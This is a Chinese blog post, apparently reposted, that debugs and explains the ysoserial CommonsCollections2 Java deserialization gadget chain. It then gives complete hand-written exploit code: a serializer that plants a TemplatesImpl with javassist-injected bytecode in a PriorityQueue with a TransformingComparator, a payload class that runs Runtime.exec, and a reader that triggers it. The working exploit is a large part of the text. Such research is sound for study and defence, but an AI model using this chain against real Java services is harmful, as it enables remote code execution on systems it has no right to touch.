java反序列化-ysoserial-调试分析总结篇(2)

2023-12-25 16:48
文章标签 java 分析 总结 调试 序列化 ysoserial

本文主要是介绍java反序列化-ysoserial-调试分析总结篇(2),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

不格小说网 https://m.vbuge.com

这篇主要分析commonCollections2,调用链如下图所示:

调用链分析:

分析环境:jdk1.8.0

 反序列化的入口点为src.zip!/java/util/PriorityQueue.java

 此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类

 接下来调用siftDownUsingConparator函数

 在这里将调用TransformingComparator的compare函数,在这里就到了新的漏洞触发点,this.transformer.transform(),而这里的this.transformer即为invokerTransformer,

在commoncollections1中第一次调用的是Lazymap的this.factory.transform,而这里是priorityQueue.java的compare里的this.transformer.transform

 

 而invokeTransformer中将反射调用,templatesImple的newTranformer方法,以前分析fastjson1.2.24时候也用的是这个内置的TemplatesImple类,其有getoutputProperties也将调用newTransformer()

接着套路思路就是在newTransformer中实例化我们的恶意字节码中包含的类,从而调用其static代码块或者构造方法中的rce代码

 

 ysoserial-exp构造

分析完调用链以后看看ysoserial是如何构造payload的

 首先创建TemplatesImpl实例

 Class.forName加载三个需要用到的类,然后调用重载的TemplatesImpl来创建实例,这里用到的技术是javassist操作类的字节码

接下来要对我们_bytecode字段所要存储的恶意字节码类进行操作,这里首先将两个类放到pool中

 其中SubTransletpaylod就是存放rce代码的类

 接下来从pool中取出要操作的类,来操作其字节码

 接下来该类创建static代码块,并且加入rce的代码,这里的代码可以自定义,读写文件也可以

 然后给该类重新设置名字,其实这个可以省略,接下来给该类设置父类为tranlet,其实这里也可以不设置,payload类里已经设置好了

 之后将rce类的字节码放到_bytecodes属性中,再设置其他依赖属性_name和_tfactory即可返回templatesImpl类

 接着定义需要反射调用的方法,这里首先用tostring进行填充,后面再放入newtransformer,声明要反序列化的队列priorityQueue,容量为2

然后反射设置invoketransformer的方法为newtransformer来替换原来的tostring,然后再将queue中的两个元素替换成templatesImpl类的实例,从而结束整个构造过程,因此构造分为三步

1.构造用于执行rce的类

2.构造templatesImpl类的实例,将1中的类填充

3.将2中的类填充到priorityqueue队列中,返回obj

手动编写exp:

exp.java

package CommonCollections2;import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public class exp {public static void main(String[] args) throws ClassNotFoundException, NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException {TemplatesImpl tmp = new TemplatesImpl();ClassPool pool = ClassPool.getDefault();pool.insertClassPath(new ClassClassPath(payload.class));CtClass clazz = pool.get(payload.class.getName());final byte[] clazzByte = clazz.toBytecode();//_bytecode为private,需要设置可访问Field _btcode = TemplatesImpl.class.getDeclaredField("_bytecodes");_btcode.setAccessible(true);_btcode.set(tmp,new byte[][]{clazzByte});//_name不为空即可Field _name = TemplatesImpl.class.getDeclaredField("_name");_name.setAccessible(true);_name.set(tmp,"tr1ple");//_tfactory可为空Field _tf = TemplatesImpl.class.getDeclaredField("_tfactory");_tf.setAccessible(true);_tf.set(tmp,null);////构造priorityqueue对象//
        PriorityQueue queue = new PriorityQueue(2);queue.add(1);queue.add(1);InvokerTransformer trans = new InvokerTransformer("newTransformer",new Class[0],new Object[0]);//InvokerTransformer trans = new InvokerTransformer("getOutputProperties",new Class[0],new Object[0]); //调用该方法一样的效果//依赖collections4TransformingComparator com = new TransformingComparator(trans);Field ComFi = PriorityQueue.class.getDeclaredField("comparator");ComFi.setAccessible(true);ComFi.set(queue,com);Field qu = PriorityQueue.class.getDeclaredField("queue");qu.setAccessible(true);Object[] objOutput = (Object[])qu.get(queue);objOutput[0] = tmp;objOutput[1] = 1;//序列化
        File file;file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser");OutputStream out = new FileOutputStream(file);ObjectOutputStream obj = new ObjectOutputStream(out);obj.writeObject(queue);obj.close();}
}

 

payload.java

package CommonCollections2;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;
import java.io.Serializable;public class payload extends AbstractTranslet  implements Serializable {{try {Runtime.getRuntime().exec("calc.exe");} catch (IOException e) {e.printStackTrace();}}public payload(){System.out.println("tr1ple 2333");}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

readObj.java

package CommonCollections2;import java.io.*;public class readObj {public static void main(String[] args) {try {FileInputStream fio = new FileInputStream(new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser"));ObjectInputStream obj = new ObjectInputStream(fio);obj.readObject();obj.close();} catch (FileNotFoundException e) {e.printStackTrace();} catch (IOException e) {e.printStackTrace();} catch (ClassNotFoundException e) {e.printStackTrace();}}
}

测试结果:

如下图所示,_bytecode中的类将被实例化,调用static代码块的代码和构造函数中的代码

总结:

整个调用链的重点是在对队列元素排序时可以自定义比较器进行转换从而触发反射调用队列元素的成员方法,相对于cc1来说构造感觉更精巧一点,这个内部TemplatesImpl类也是jdk内置的,攻击效果也不受到jdk版本影响,只要cc4.0的依赖存在即可

 

这篇关于java反序列化-ysoserial-调试分析总结篇(2)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/536216

相关文章

Java 正则表达式URL 匹配与源码全解析

Java 正则表达式URL 匹配与源码全解析

《Java正则表达式URL匹配与源码全解析》在Web应用开发中,我们经常需要对URL进行格式验证,今天我们结合Java的Pattern和Matcher类,深入理解正则表达式在实际应用中... 目录1.正则表达式分解:2. 添加域名匹配 (2)3. 添加路径和查询参数匹配 (3) 4. 最终优化版本5.设计思
阅读更多...
Java使用ANTLR4对Lua脚本语法校验详解

Java使用ANTLR4对Lua脚本语法校验详解

《Java使用ANTLR4对Lua脚本语法校验详解》ANTLR是一个强大的解析器生成器,用于读取、处理、执行或翻译结构化文本或二进制文件,下面就跟随小编一起看看Java如何使用ANTLR4对Lua脚本... 目录什么是ANTLR?第一个例子ANTLR4 的工作流程Lua脚本语法校验准备一个Lua Gramm
阅读更多...
Java字符串操作技巧之语法、示例与应用场景分析

Java字符串操作技巧之语法、示例与应用场景分析

《Java字符串操作技巧之语法、示例与应用场景分析》在Java算法题和日常开发中,字符串处理是必备的核心技能,本文全面梳理Java中字符串的常用操作语法,结合代码示例、应用场景和避坑指南,可快速掌握字... 目录引言1. 基础操作1.1 创建字符串1.2 获取长度1.3 访问字符2. 字符串处理2.1 子字
阅读更多...
Java Optional的使用技巧与最佳实践

Java Optional的使用技巧与最佳实践

《JavaOptional的使用技巧与最佳实践》在Java中,Optional是用于优雅处理null的容器类,其核心目标是显式提醒开发者处理空值场景,避免NullPointerExce... 目录一、Optional 的核心用途二、使用技巧与最佳实践三、常见误区与反模式四、替代方案与扩展五、总结在 Java
阅读更多...
基于Java实现回调监听工具类

基于Java实现回调监听工具类

《基于Java实现回调监听工具类》这篇文章主要为大家详细介绍了如何基于Java实现一个回调监听工具类,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录监听接口类 Listenable实际用法打印结果首先,会用到 函数式接口 Consumer, 通过这个可以解耦回调方法,下面先写一个
阅读更多...
使用Java将DOCX文档解析为Markdown文档的代码实现

使用Java将DOCX文档解析为Markdown文档的代码实现

《使用Java将DOCX文档解析为Markdown文档的代码实现》在现代文档处理中,Markdown(MD)因其简洁的语法和良好的可读性,逐渐成为开发者、技术写作者和内容创作者的首选格式,然而,许多文... 目录引言1. 工具和库介绍2. 安装依赖库3. 使用Apache POI解析DOCX文档4. 将解析
阅读更多...
Java字符串处理全解析(String、StringBuilder与StringBuffer)

Java字符串处理全解析(String、StringBuilder与StringBuffer)

《Java字符串处理全解析(String、StringBuilder与StringBuffer)》:本文主要介绍Java字符串处理全解析(String、StringBuilder与StringBu... 目录Java字符串处理全解析:String、StringBuilder与StringBuffer一、St
阅读更多...
springboot整合阿里云百炼DeepSeek实现sse流式打印的操作方法

springboot整合阿里云百炼DeepSeek实现sse流式打印的操作方法

《springboot整合阿里云百炼DeepSeek实现sse流式打印的操作方法》:本文主要介绍springboot整合阿里云百炼DeepSeek实现sse流式打印,本文给大家介绍的非常详细,对大... 目录1.开通阿里云百炼,获取到key2.新建SpringBoot项目3.工具类4.启动类5.测试类6.测
阅读更多...
Spring Boot循环依赖原理、解决方案与最佳实践(全解析)

Spring Boot循环依赖原理、解决方案与最佳实践(全解析)

《SpringBoot循环依赖原理、解决方案与最佳实践(全解析)》循环依赖指两个或多个Bean相互直接或间接引用,形成闭环依赖关系,:本文主要介绍SpringBoot循环依赖原理、解决方案与最... 目录一、循环依赖的本质与危害1.1 什么是循环依赖?1.2 核心危害二、Spring的三级缓存机制2.1 三
阅读更多...
在Spring Boot中浅尝内存泄漏的实战记录

在Spring Boot中浅尝内存泄漏的实战记录

《在SpringBoot中浅尝内存泄漏的实战记录》本文给大家分享在SpringBoot中浅尝内存泄漏的实战记录,结合实例代码给大家介绍的非常详细,感兴趣的朋友一起看看吧... 目录使用静态集合持有对象引用,阻止GC回收关键点:可执行代码:验证:1,运行程序(启动时添加JVM参数限制堆大小):2,访问 htt
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2